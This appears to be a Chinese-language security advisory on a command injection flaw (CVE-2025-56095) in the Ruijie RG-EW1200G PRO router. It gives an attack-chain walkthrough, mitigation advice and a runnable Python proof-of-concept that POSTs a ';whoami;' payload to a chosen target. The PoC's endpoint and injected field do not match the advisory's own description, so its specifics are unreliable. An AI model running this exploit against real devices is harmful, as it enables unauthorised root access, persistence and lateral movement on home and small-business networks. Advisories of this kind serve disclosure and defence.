CVE-2025-56095 锐捷RG-EW1200G PRO路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56095

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-EW1200G PRO (V1.00/V2.00/V3.00/V4.00)

漏洞概述

CVE-2025-56095是锐捷网络（Ruijie Networks）旗下RG-EW1200G PRO路由器中存在的一个高危操作系统命令注入漏洞。该漏洞存在于设备的Web管理界面中，具体位于/usr/local/lua/dev_sta/nbr_cwmp.lua文件的module_set模块。攻击者可以通过构造恶意的POST请求，在未经授权或仅需低权限的情况下，在受影响设备上执行任意操作系统命令。由于该路由器通常部署在家庭和小型企业网络环境中，漏洞的利用可能对大量网络基础设施造成严重影响。CVSS 3.1评分高达8.8，属于高危漏洞，具有较高的机密性、完整性和可用性影响。攻击者成功利用此漏洞可以获得设备的完全控制权，进而可能横向移动到内网其他系统，窃取敏感数据或部署恶意软件。由于该漏洞无需用户交互即可利用，且可通过网络远程触发，因此具有极高的实际威胁性。

技术细节

该漏洞的根本原因在于应用程序对用户输入缺乏有效的安全过滤和验证。在Ruijie RG-EW1200G PRO路由器的Web接口中，module_set功能点未能对传入参数进行严格的输入验证，导致攻击者可以在HTTP POST请求中注入操作系统命令。漏洞文件路径为/usr/local/lua/dev_sta/nbr_cwmp.lua，攻击者通过构造包含shell命令特殊字符（如分号、管道符、反引号等）的请求参数，可以突破应用程序的预期执行流程，迫使底层操作系统执行任意命令。由于该设备运行的是嵌入式Linux系统，攻击者注入的命令将以root权限执行，从而获得设备的完全控制权。攻击者可以利用此漏洞执行系统命令、读取敏感配置文件、修改网络设置或植入后门程序。整个攻击过程不需要高权限认证，低权限账户即可触发漏洞，这大大增加了漏洞的利用风险。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备为Ruijie RG-EW1200G PRO路由器，确认设备型号和固件版本（V1.00/V2.00/V3.00/V4.00）。

STEP 2

步骤2: 漏洞定位

攻击者访问设备的Web管理界面，找到/module_set端点（位于/usr/local/lua/dev_sta/nbr_cwmp.lua），该端点存在命令注入漏洞。

STEP 3

步骤3: 构造恶意请求

攻击者构造包含恶意命令的POST请求，在module_set参数中注入操作系统命令（如分号、管道符等特殊字符）。

STEP 4

步骤4: 命令执行

服务器端未能对用户输入进行安全过滤，注入的命令被传递给系统shell执行，攻击者获得命令执行结果。

STEP 5

步骤5: 权限提升与持久化

由于设备以root权限运行服务，攻击者直接获得root权限，可进一步植入后门、修改配置或横向移动到内网其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56095 PoC - Ruijie RG-EW1200G PRO Command Injection
# Target: Ruijie RG-EW1200G PRO (V1.00/V2.00/V3.00/V4.00)
# Vulnerability: OS Command Injection in module_set endpoint

def exploit_cve_2025_56095(target_ip, target_port=80):
    """
    Exploit for CVE-2025-56095: OS Command Injection in Ruijie RG-EW1200G PRO
    
    Args:
        target_ip: Target device IP address
        target_port: Target device web interface port (default: 80)
    
    Returns:
        bool: True if exploitation successful, False otherwise
    """
    url = f"http://{target_ip}:{target_port}/cgi-bin/luci/api/nbr_cwmp/module_set"
    
    # Payload to execute arbitrary command (whoami)
    # The actual vulnerability is in the module_set parameter handling
    payload = ";whoami;"
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }
    
    data = {
        'module': 'cwmp',
        'action': 'set',
        'param': payload  # Command injection point
    }
    
    try:
        print(f"[*] Targeting {target_ip}:{target_port}")
        print(f"[*] Sending malicious request to {url}")
        print(f"[*] Payload: {payload}")
        
        response = requests.post(url, data=data, headers=headers, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body:\n{response.text}")
        
        return True
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit_cve_2025_56095(target, port)

影响范围

Ruijie RG-EW1200G PRO V1.00

Ruijie RG-EW1200G PRO V2.00

Ruijie RG-EW1200G PRO V3.00

Ruijie RG-EW1200G PRO V4.00

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）将路由器管理界面限制在可信网络范围内，避免暴露在公网；2）使用强密码策略保护管理账户，启用双因素认证（如果设备支持）；3）通过防火墙规则限制对路由器管理端口（通常为80/443）的访问，仅允许受信任的IP地址访问；4）监控设备日志，关注异常的POST请求和命令执行行为；5）考虑使用VPN或零信任架构替代直接管理访问。